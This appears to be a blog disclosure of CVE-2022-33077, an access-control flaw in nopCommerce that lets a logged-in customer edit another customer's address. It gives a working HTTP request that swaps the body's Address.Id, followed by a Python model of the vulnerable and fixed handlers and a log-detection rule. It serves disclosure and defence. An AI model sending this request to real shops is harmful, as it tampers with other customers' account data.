
CVE-2022-33077: IDOR to change the address of any customer via parameter pollution in nopCommerce

Description

There is an access control vulnerability affecting nopCommerce (≤ 4.50.2) and also the upcoming beta version (4.60). The vulnerability lies in the “addressedit” endpoint: a malicious customer can modify the addresses of other users on the site. It has been assigned CVE-2022-33077.

Proof of concept

  1. Register 2 customers (C1 and C2) and add one address each (A1 for C1, A2 for C2). Note down the address ids of both created addresses (call them A1_ID and A2_ID). We will now log in as C1 and modify A2.
  2. Log in as C1 and capture the POST request that edits your own address, as shown below. I’ve highlighted the 4 parameters that you need to replace.

     ```http
     POST /customer/addressedit/<A1_ID> HTTP/2
     Host: localhost
     Cookie: <C1_Session_Cookies_Here>
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 506
     Origin: http://localhost
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: iframe
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1
     Te: trailers

     Address.Id=<A2_ID>&Address.FirstName=testing&Address.LastName=123&Address.Email=hello@hello.lcom&Address.Company=&Address.CountryId=211&Address.StateProvinceId=0&Address.City=sdv&Address.Address1=dsv&Address.Address2=&Address.ZipPostalCode=sdv&Address.PhoneNumber=12&Address.FaxNumber=&__RequestVerificationToken=<C1_CSRF_TOKEN_HERE>
     ```

  3. Upon sending the above request with C1’s session cookie, C2’s address is updated. The server first checks that the address id in the URL belongs to the customer identified by the session cookie, but it then applies the update to the `Address.Id` supplied in the POST body, which was never checked. Logically, it should only update the record it validated.
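The following Python is an added illustration of the pattern described in step 3 and of how the check should be structured; it is not nopCommerce’s code. The address store, the two handler functions, the request parser and the sample request (with A1_ID=1, A2_ID=2 and a placeholder token filled in) are all constructed stand-ins. The vulnerable handler authorises on the id in the URL but writes to the id from the body; the fixed handler writes only to the record the ownership check returned. The `id_mismatch` function is a simple detection rule for logs that retain request bodies: a path id that differs from the body’s `Address.Id` is the signature of this attempt.

```python
"""Model of the addressedit access-control flaw and its fix (added example,
not nopCommerce's code). Store, handlers, parser and sample data are constructed."""
from dataclasses import dataclass
from urllib.parse import parse_qs


@dataclass
class Address:
    id: int
    customer_id: int
    city: str


class AddressStore:
    """Minimal in-memory stand-in for the addresses table."""

    def __init__(self, addresses):
        self._by_id = {a.id: a for a in addresses}

    def get(self, address_id):
        return self._by_id.get(address_id)

    def get_for_customer(self, customer_id, address_id):
        """Ownership check: the record must exist and belong to this customer."""
        address = self._by_id.get(address_id)
        if address is None or address.customer_id != customer_id:
            return None
        return address


def address_edit_vulnerable(store, session_customer_id, url_address_id, form):
    """Hypothetical handler showing the flaw: the ownership check uses the URL
    id, but the update is applied to Address.Id taken from the POST body."""
    if store.get_for_customer(session_customer_id, url_address_id) is None:
        return 403
    target = store.get(int(form["Address.Id"]))  # body value, never authorised
    if target is None:
        return 404
    target.city = form["Address.City"]
    return 200


def address_edit_fixed(store, session_customer_id, url_address_id, form):
    """Hardened handler: update only the record the ownership check returned.
    Any Address.Id present in the body is ignored."""
    owned = store.get_for_customer(session_customer_id, url_address_id)
    if owned is None:
        return 403
    owned.city = form["Address.City"]
    return 200


def parse_address_edit(raw_request):
    """Split a raw HTTP request into (path id, body Address.Id, form fields)."""
    head, _, body = raw_request.partition("\n\n")
    path = head.splitlines()[0].split()[1]
    url_id = int(path.rstrip("/").rsplit("/", 1)[-1])
    form = {k: v[0] for k, v in parse_qs(body.strip(), keep_blank_values=True).items()}
    body_id = int(form["Address.Id"]) if form.get("Address.Id") else None
    return url_id, body_id, form


def id_mismatch(raw_request):
    """Detection rule: flag an addressedit POST whose body Address.Id differs
    from the id in the path (requires request bodies to be logged)."""
    url_id, body_id, _ = parse_address_edit(raw_request)
    return body_id is not None and body_id != url_id


# Constructed sample: customer 1 owns address 1, customer 2 owns address 2.
# Mirrors the captured request with A1_ID=1, A2_ID=2 and a placeholder token.
SAMPLE_REQUEST = (
    "POST /customer/addressedit/1 HTTP/2\n"
    "Host: localhost\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "Address.Id=2&Address.FirstName=testing&Address.LastName=123"
    "&Address.City=sdv&Address.Address1=dsv&Address.CountryId=211"
    "&__RequestVerificationToken=PLACEHOLDER_TOKEN\n"
)


def run_scenario(handler):
    """Replay the sample request as customer 1 against a fresh store and
    return (status, city of address 1, city of address 2)."""
    store = AddressStore([Address(1, 1, "c1-city"), Address(2, 2, "c2-city")])
    url_id, _, form = parse_address_edit(SAMPLE_REQUEST)
    status = handler(store, 1, url_id, form)
    return status, store.get(1).city, store.get(2).city


if __name__ == "__main__":
    print("vulnerable:", run_scenario(address_edit_vulnerable))  # address 2 changes
    print("fixed:", run_scenario(address_edit_fixed))            # only address 1 changes
    print("mismatch flagged:", id_mismatch(SAMPLE_REQUEST))
```

The fix is deliberately not “compare the two ids and reject on mismatch”: binding the update to the authorised record removes the body id from the decision entirely, so there is no second value to get wrong. The mismatch rule is still useful retrospectively on access logs to find attempts against unpatched instances, with the caveat that most default access logs do not record POST bodies.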

Video POC

nopCommerce IDOR POC

This post is licensed under CC BY 4.0 by the author.